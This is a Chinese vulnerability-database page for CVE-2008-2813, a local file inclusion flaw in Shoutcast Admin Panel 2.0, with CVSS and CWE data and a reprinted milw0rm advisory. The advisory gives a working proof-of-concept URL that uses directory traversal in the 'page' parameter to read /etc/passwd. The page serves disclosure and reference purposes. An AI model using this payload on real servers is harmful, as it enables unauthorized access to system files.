CVE-2008-2813-漏洞详情-微慑信息网-VulSee.com

CVE-2008-2813

CVSS

6.8

发布时间 :2008-06-23 13:41:00

修订时间 :2008-09-05 00:00:00

NMCOE

[原文]Directory traversal vulnerability in index.php in WallCity-Server Shoutcast Admin Panel 2.0, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter.

[CNNVD]WallCity-Server Shoutcast 控制面板 ‘index.php’ 目录遍历漏洞(CNNVD-200806-303)

WallCity-Server Shoutcast 控制面板 2.0的index.php中存在目录遍历漏洞, 在magic_quotes_gpc无效时, 远程攻击者可以通过页参数的一个'..'来包含和执行任意本地文件。

–
CVSS (基础分值)

CVSS分值:	6.8	[中等(MEDIUM)]
机密性影响:	PARTIAL	[很可能造成信息泄露]
完整性影响:	PARTIAL	[可能会导致系统文件被修改]
可用性影响:	PARTIAL	[可能会导致性能下降或中断资源访问]
攻击复杂度:	MEDIUM	[漏洞利用存在一定的访问条件]
攻击向量:	NETWORK	[攻击者不需要获取内网访问权或本地访问权]
身份认证:	NONE	[漏洞利用无需身份认证]

–
CWE (弱点类目)

CWE-22

[对路径名的限制不恰当（路径遍历）]

–
CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

–
OVAL (用于检测的技术细节)

未找到相关OVAL定义

–
官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2813 (官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2813 (官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200806-303 (官方数据源) CNNVD

–
其它链接及资源

http://xforce.iss.net/xforce/xfdb/43109

(UNKNOWN) XF shoutcast-index-file-include(43109)

http://www.securityfocus.com/bid/29733

(UNKNOWN) BID 29733

http://www.milw0rm.com/exploits/5813

(UNKNOWN) MILW0RM 5813

http://secunia.com/advisories/30678

(VENDOR_ADVISORY) SECUNIA 30678

–
漏洞信息

漏洞名称:WallCity-Server Shoutcast 控制面板 ‘index.php’ 目录遍历漏洞
紧急程度:中危	漏洞类型:路径遍历
发布日期:2008-06-23 00:00:00	更新日期:2008-09-05 00:00:00
攻击路径:远程
详细介绍:
WallCity-Server Shoutcast 控制面板 2.0的index.php中存在目录遍历漏洞, 在magic_quotes_gpc无效时, 远程攻击者可以通过页参数的一个'..'来包含和执行任意本地文件。

–
公告与补丁

目前厂商还没有提供补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本。

–
漏洞信息 (5813)

漏洞名称:Shoutcast Admin Panel 2.0 (page) Local File Inclusion Vulnerability (EDBID:5813)
影响平台:php	漏洞类型:webapps
发布日期:2008-06-14	确认状态:Verified
漏洞端口:0	代码作者:CWH Underground
系统下载: N/A	代码下载: [点击下载]

============================================================
 Shoutcast Admin Panel 2.0 Local File Inclusion Vulnerability
============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE : 14 June 2008
SITE : www.citec.us

#####################################################
 APPLICATION : WallCity-Server: Shoutcast Admin Panel
 VERSION     : 2.0
 DOWNLOAD    : http://downloads.sourceforge.net/shoutcastadmin
#####################################################

---LFI---

-------------------------
 Vulnerable in index.php
-------------------------

@Line

    79: if (isset($_GET['page']))
    80:         $page = $_GET['page'];
    81: else
    82:  $page = "main";
    .
    .
    .
   204:  

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/wallcity/index.php?page=../../../../../../etc/passwd%00

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-14]

–
漏洞信息

OSVDBID: 46152
漏洞名称:SHOUTcast Admin Panel index.php page Parameter Traversal Local File Inclusion
漏洞位置: Remote / Network Access	利用方式: Input Manipulation
漏洞影响:Loss of Integrity	解决方式:
漏洞利用:Exploit Public	公开方式:Uncoordinated Disclosure

–
漏洞描述

–
时间线

公开日期: 2008-06-14	发现日期: Unknow
利用日期:2008-06-14	解决日期:Unknow

CVE-2008-2813-漏洞详情

–
CVSS (基础分值)

–
CWE (弱点类目)

–
CPE (受影响的平台与产品)

–
OVAL (用于检测的技术细节)

–
官方数据库链接

–
其它链接及资源

–
漏洞信息

–
公告与补丁

–
漏洞信息 (5813)

–
漏洞信息

–
漏洞描述

–
时间线

–
解决方案

相关推荐

评论抢沙发

微慑网

最新文章

随机文章

微慑标签

热门文章

信息资源

友情链接

域名

安全站点

工具

特效

本站信息

其他操作

赞助本站

微慑信息网专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

觉得文章有用就打赏一下文章作者

非常感谢你的打赏，我们将继续提供更多优质内容，让我们一起创建更加美好的网络世界！

支付宝扫一扫

微信扫一扫

切换注册登录

切换登录注册

2021 年 11 月
一	二	三	四	五	六	日
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28	29
30	31

– CVSS (基础分值)

– CWE (弱点类目)

– CPE (受影响的平台与产品)

– OVAL (用于检测的技术细节)

– 官方数据库链接

– 其它链接及资源

– 漏洞信息

– 公告与补丁

– 漏洞信息 (5813)

– 漏洞信息

– 漏洞描述

– 时间线

– 解决方案

相关推荐

评论 抢沙发

微慑网

最新文章

随机文章

微慑标签

热门文章

信息资源

友情链接

域名

安全站点

工具

特效

本站信息

其他操作

赞助本站

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

觉得文章有用就打赏一下文章作者

非常感谢你的打赏，我们将继续提供更多优质内容，让我们一起创建更加美好的网络世界！

支付宝扫一扫

微信扫一扫

切换注册登录

切换登录注册

–
CVSS (基础分值)

–
CWE (弱点类目)

–
CPE (受影响的平台与产品)

–
OVAL (用于检测的技术细节)

–
官方数据库链接

–
其它链接及资源

–
漏洞信息

–
公告与补丁

–
漏洞信息 (5813)

–
漏洞信息

–
漏洞描述

–
时间线

–
解决方案

评论抢沙发

微慑信息网专注工匠精神